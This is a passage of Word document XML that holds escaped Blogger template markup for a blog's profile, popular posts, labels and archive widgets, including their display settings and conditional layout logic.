        <w:t xml:space="preserve">                  &lt;data:displayname/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='data:hasgoogleprofile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='g-follow' data-annotation='bubble' data-height='20' expr:data-href='data:userUrl'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/dt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:if cond='data:showlocation'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;dd class='profile-data'&gt;&lt;data:location/&gt;&lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:if cond='data:aboutme != &amp;quot;&amp;quot;'&gt;&lt;dd class='profile-textblock'&gt;&lt;data:aboutme/&gt;&lt;/dd&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/dl&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;a class='profile-link' expr:href='data:userUrl' rel='author'&gt;&lt;data:viewProfileMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='PopularPosts1' locked='false' title='Popular Posts' type='PopularPosts' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='numItemsToShow'&gt;3&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showThumbnails'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showSnippets'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='timeRange'&gt;LAST_YEAR&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;&lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='widget-content popular-posts'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='!data:showThumbnails'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:if cond='!data:showSnippets'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;!-- (1) No snippet/thumbnail --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;a expr:href='data:post.href'&gt;&lt;data:post.title/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;!-- (2) Show only snippets --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='item-title'&gt;&lt;a expr:href='data:post.href'&gt;&lt;data:post.title/&gt;&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='item-snippet'&gt;&lt;data:post.snippet/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;!-- (3) Show only thumbnails or (4) Snippets and thumbnails. --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div expr:class='data:showSnippets ? &amp;quot;item-content&amp;quot; : &amp;quot;item-thumbnail-only&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;b:if cond='data:post.featuredImage.isResizable or data:post.thumbnail'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='item-thumbnail'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;a expr:href='data:post.href' target='_blank'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;b:with value='data:post.featuredImage.isResizable                                  ? resizeImage(data:post.featuredImage, 72, &amp;quot;1:1&amp;quot;)                                  : data:post.thumbnail' var='image'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;img alt='' border='0' expr:src='data:image'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                          &lt;/b:with&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='item-title'&gt;&lt;a expr:href='data:post.href'&gt;&lt;data:post.title/&gt;&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;b:if cond='data:showSnippets'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='item-snippet'&gt;&lt;data:post.snippet/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div style='clear: both;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='Label1' locked='false' title='Labels' type='Label' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='sorting'&gt;ALPHA&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='display'&gt;LIST&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='selectedLabelsList'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showType'&gt;ALL&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showFreqNumbers'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div expr:class='&amp;quot;widget-content &amp;quot; + data:display + &amp;quot;-label-widget-content&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:display == &amp;quot;list&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:loop values='data:labels' var='label'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:if cond='data:blog.url == data:label.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;span expr:dir='data:blog.languageDirection'&gt;&lt;data:label.name/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url'&gt;&lt;data:label.name/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:if cond='data:showFreqNumbers'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;span dir='ltr'&gt;(&lt;data:label.count/&gt;)&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:loop values='data:labels' var='label'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;span expr:class='&amp;quot;label-size label-size-&amp;quot; + data:label.cssSize'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='data:blog.url == data:label.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;span expr:dir='data:blog.languageDirection'&gt;&lt;data:label.name/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url'&gt;&lt;data:label.name/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='data:showFreqNumbers'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;span class='label-count' dir='ltr'&gt;(&lt;data:label.count/&gt;)&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/b:section-contents&gt;&lt;b:section-contents id='footer-1'/&gt;&lt;b:section-contents id='footer-2-1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='BlogArchive1' locked='false' title='Blog Archive' type='BlogArchive' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showStyle'&gt;HIERARCHY&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='yearPattern'&gt;yyyy&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showWeekEnd'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='monthPattern'&gt;MMMM&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='dayPattern'&gt;MMM dd&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='weekPattern'&gt;MM/dd&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='chronological'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showPosts'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='frequency'&gt;MONTHLY&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div id='ArchiveList'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div expr:id='data:widget.instanceId + &amp;quot;_ArchiveList&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
